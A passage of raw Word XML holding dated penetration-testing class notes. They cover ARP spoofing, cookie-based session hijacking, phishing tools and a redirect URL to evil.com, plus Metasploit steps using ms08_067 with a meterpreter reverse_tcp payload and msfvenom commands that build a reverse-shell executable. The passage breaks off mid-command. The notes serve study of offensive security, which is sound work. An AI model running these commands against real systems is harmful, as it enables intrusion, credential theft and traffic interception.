    </w:p>
    <w:p w14:paraId="000003DB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003DC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>AUTOMATED PROCESS OF ARP SPOOFING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003DD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">ETTERCAP - GUI tool </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003DE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003DF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">URLSNARF - to grab the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> accessed by your victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003E0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>urlsnarf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000003E1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003E2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DRIFTNET - to grab the images accessed by your victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003E3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>driftnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003E4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003E5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003E6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003E7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>01-10-2021, FRIDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003E8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. SESSION HIJACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003E9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- LAN based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003EA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003EB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003EC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- It gets created after the client has given a user name and password and when server accepts that, a session is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003ED" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- This session gets reauthenticated by the server frequently during the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003EE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003EF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>COokies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003F0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a random value generated by the server which is equivalent/random value for the password which you gave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003F1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003F2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Session </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HIjacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000003F3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Involves in grabbing the cookies and using the cookies to login to user session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003F4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003F5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003F6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TOOL - HAMSTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003F7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003F8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>OWASP - Open Web Application Security Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003F9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003FA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003FB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003FC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003FD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. DOS / DDOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003FE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003FF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Internal attack - LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000400" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>External attack - WAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000401" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000402" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000403" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>04-10-2021, MONDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000404" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000405" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WAN EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000406" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000407" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>PHISHING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000408" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000409" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WWW.FACEBOOK.COM/LOGIN.PHP/?ID=1&amp;PRODUCT=NTESCRAP&amp;REDIRECT_URL=HTTP://EVIL.COM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000040A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000040B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">TOOLS - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000040C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000040D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Social Engineering Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000040E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AdvPhishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000040F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Blackphish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000410" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lockphish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - (Mobile pattern lock identification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000411" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000412" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Social Engineering Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000413" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Most commonly used tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000414" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- It has combination of a lot of tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000415" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Usage is very simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000416" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000417" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000418" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000419" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- QR code generator using SET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000041A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>(Find the location of the output file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000041B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Mass mailer attack using SET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000041C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Blackphish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lockphish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000041D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SEt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to perform DNS Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000041E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000041F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>05-10-2021, TUESDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000420" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000421" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>MSF - Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000422" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a ruby based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> platform which helps to write, test and execute exploit code / payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000423" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- It has collection of vulnerabilities from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>differnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> domains and technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000424" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000425" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>COMMON TERMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000426" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>EXPLOIT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- Actual vulnerability or weakness with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wihch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we attack our target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000427" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>PAYLOAD</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- What we get in return with the list of available exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000428" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>AUXILLARY</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Combination of both exploit and payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000429" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>METERPRETER</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Advanced payload (Like a command prompt with advanced options)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000042A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000042B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>COMMANDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000042C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>USE</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Use any module / exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000042D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SET</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Set parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000042E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SHOW</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- To display all available options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000042F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SEARCH</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- To search any vulnerability/exploit/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000430" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- Local Host (Ur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000431" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Local port (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000432" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- Remote Host (Victim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000433" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>RPORT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Remote Port (victim port number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000434" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000435" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>STEPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000436" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. Search for exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000437" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (keyword)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000438" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. Use exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000439" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>use  exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ms08_67_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000043A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. Set payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000043B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000043C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000043D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>it displays all available options which we have to set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000043E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000043F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000440" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ms08_67_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000441" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000442" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>08 - year 2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000443" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">67 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the 67th vulnerability which was reported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000444" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000445" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000446" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>MSFVENOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000447" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000448" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=192.168.1.101 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000449" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-f exe &gt; /root/Desktop/test.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000044A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000044B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000044C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>KALI LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000044D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000044E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Terminal 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000044F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
